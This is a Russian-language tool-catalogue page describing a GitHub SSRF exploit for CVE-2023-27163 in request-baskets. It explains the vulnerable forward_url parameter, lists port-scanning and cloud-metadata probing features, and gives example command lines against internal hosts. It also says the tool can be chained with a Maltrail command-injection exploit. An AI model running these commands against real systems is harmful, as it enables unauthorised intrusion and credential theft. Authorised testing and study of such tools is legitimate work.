Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-27163-exploit — Эксплойт SSRF для CVE-2023-27163 в request-baskets, позволяющий сканирование внутренних портов, зондирование метаданных облака и обнаружение служб через вредоносную пересылку корзин. | Kitploit
Инструменты/GitHubGitHub/jeanback1/cve-2023-27163-exploit
РазведкаСканирование портовАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийБезопасность облачных сред
GitHubjeanback1/cve-2023-27163-exploit

CVE-2023-27163-exploit

Эксплойт SSRF для CVE-2023-27163 в request-baskets, позволяющий сканирование внутренних портов, зондирование метаданных облака и обнаружение служб через вредоносную пересылку корзин.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
3 месяцев назадЕщё не проверено

CVE-2023-27163 — SSRF-эксплойт для request-baskets

Я написал этот эксплойт для использования CVE-2023-27163 — уязвимости подделки серверных запросов (SSRF), обнаруженной в request-baskets версии ≤ 1.2.1. Ошибка находится в конечной точке /api/baskets/{name}, где параметр forward_url позволяет злоумышленнику заставить сервер отправлять произвольные HTTP-запросы от его имени.

Как это работает

Эксплойт создаёт вредоносную «корзину», настроенную с forward_url, указывающим на внутреннюю цель. Любой запрос к конечной точке этой корзины пересылается сервером на указанный URL, фактически превращая сервер в SSRF-прокси.

Возможности

  • Пересылка SSRF-запросов на любой внутренний или внешний URL
  • Сканирование портов на внутренних хостах через HTTP-зонд
  • Зондирование конечных точек метаданных облачных провайдеров (AWS, GCP, Azure, DigitalOcean, Alibaba)
  • Обнаружение распространённых внутренних сервисов
  • Настраиваемые профили корзин (прокси, небезопасный TLS, расширение пути)

Требования

  • Python 3.6+
  • Библиотека requests (pip install requests)

Использование

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-f FORWARD_URL] [--proxy-response]
                  [--insecure-tls] [--no-expand-path] [--capacity CAPACITY]
                  [--scan-host SCAN_HOST] [--ports PORTS] [--scan]
                  [--discover] [--cloud-metadata] [--timeout TIMEOUT]
                  [--delay DELAY]

Примеры

root@kitploit:~
# Базовая пересылка SSRF на внутренний сервис
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80/admin

# Сканирование портов внутреннего хоста
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 127.0.0.1 --scan

# Зондирование конечных точек облачных метаданных
python3 exploit.py -t http://192.168.1.100:55555 --cloud-metadata

# Режим прокси (возвращает тело пересланного ответа)
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80 --proxy-response

# Сканирование пользовательского диапазона портов
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 10.0.0.2 \
         --ports 80,443,3000,5000,8000,8080,9000

Отказ от ответственности

Я создал этот инструмент только для образовательных целей и авторизованного тестирования безопасности. Не используйте его против систем без явного разрешения.


Взаимодействие с

Этот SSRF-эксплойт может использоваться как начальная точка входа для доступа к внутренним сервисам, которые не доступны напрямую. Я разработал его для совместной работы с Maltrail-v0.53-Exploit — SSRF-туннель позволяет вам обращаться к экземпляру Maltrail, работающему на localhost, и через него запускать инъекцию команд.

CVE-2023-27163-exploit

Скачать инструмент